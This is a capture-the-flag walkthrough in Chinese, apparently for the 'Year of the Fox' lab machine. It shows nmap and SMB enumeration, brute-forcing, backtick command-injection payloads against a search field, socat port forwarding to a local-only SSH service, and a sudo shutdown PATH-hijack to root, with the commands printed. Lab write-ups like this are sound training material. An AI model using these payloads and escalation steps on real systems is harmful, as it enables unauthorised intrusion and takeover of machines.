Year of the Fox
端口扫描
root@ip-10-10-19-210:~/yotf# nmap -sTCV -p 80,139,445 --min-rate 1000 10.10.73.227
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-28 02:56 BST
Nmap scan report for ip-10-10-73-227.eu-west-1.compute.internal (10.10.73.227)
Host is up (0.00017s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=You want in? Gotta guess the password!
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
MAC Address: 02:B5:2F:0F:B6:4D (Unknown)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX
Host script results:
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: year-of-the-fox
| NetBIOS computer name: YEAR-OF-THE-FOX\x00
| Domain name: lan
| FQDN: year-of-the-fox.lan
|_ System time: 2023-10-28T02:56:37+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-10-28 02:56:37
|_ start_date: 1600-12-31 23:58:45
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.15 seconds
80
从端口扫描结果中��我们可以看到401 需要进行认证操作 , 但是我们不知道用户名, 同时存在 SMB 服务所以我们可以使用工具 enum4linux 进行扫描, 从中可以扫描到两个用户:
S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)
使用上面得到的用户名进行暴力破解我们可以得到一个凭证
之后进行登陆, 通过页面观察我们可以发现这是一个搜索页面, 同时搜索完成之后会给我们一些 文件的名称, 所以我猜测后端功能为列出某个目录的文件, 所以可能存在命令注入漏洞
使用 Burp 拦截进行一系列的测试, 从响应中我推断了一些内容:
- 基于下面的一系列的请求我判断可以使用 `` 来进行操作
- 从响应来看是命令注入盲注
"target":"${id}" --> ["Invalid Character"]
"target":";ls" --> ["No file returned"]
"target":"`id`" --> ["No file returned"]
"target":"`echo creds2.tx*`" --> ["creds2.txt"]
后渗透
www-data
使用上面的命令注入漏洞来获取一个 reverse Shell
www-data —> fox
在获取到 www-data 用户的 Shell 之后我本来想尝试重用 rascal 用户的凭证但是发现 su 、ssh 都已经被禁止, 我们无法使用, 所以我尝试端口转发来进行登陆
这里查看 /etc/ssh/sshd_config 在其中发现一些特殊内容
(remote) www-data@year-of-the-fox:/tmp$ cat /etc/ssh/sshd_config
....
ListenAddress 127.0.0.1
AllowUsers fox
....
这表明只有 fox 用户允许 SSH 登陆, 所以我们暴力破解也更加容易, 上传 socat 进行本地端口转发
(remote) www-data@year-of-the-fox:/tmp$ ./socat TCP4-LISTEN:4444,fork TCP4:127.0.0.1:22
之后进行 SSH 登陆即可
fox —> root
登陆之后发现用户 fox 具有 SUDO 特权执行 shutdown 命令, 经过搜索可以发现这个利用方式
Sudo Shutdown, Poweroff Privilege Escalation | Exploit Notes
fox@year-of-the-fox:~$ sudo -l
Matching Defaults entries for fox on year-of-the-fox:
env_reset, mail_badpass
User fox may run the following commands on year-of-the-fox:
(root) NOPASSWD: /usr/sbin/shutdown
fox@year-of-the-fox:~/samba$ echo /bin/bash > /tmp/poweroff
fox@year-of-the-fox:~/samba$ chmod +x /tmp/poweroff
fox@year-of-the-fox:~/samba$ export PATH=/tmp:$PATH
fox@year-of-the-fox:~/samba$ sudo -u root /usr/sbin/shutdown
root@year-of-the-fox:~/samba# id
uid=0(root) gid=0(root) groups=0(root)
Rabbit holes
creads
我们在枚举中会发现两个 creads.txt 文件, 这些文件的解密规则为: base32-base64 但是解密之后什么用也没有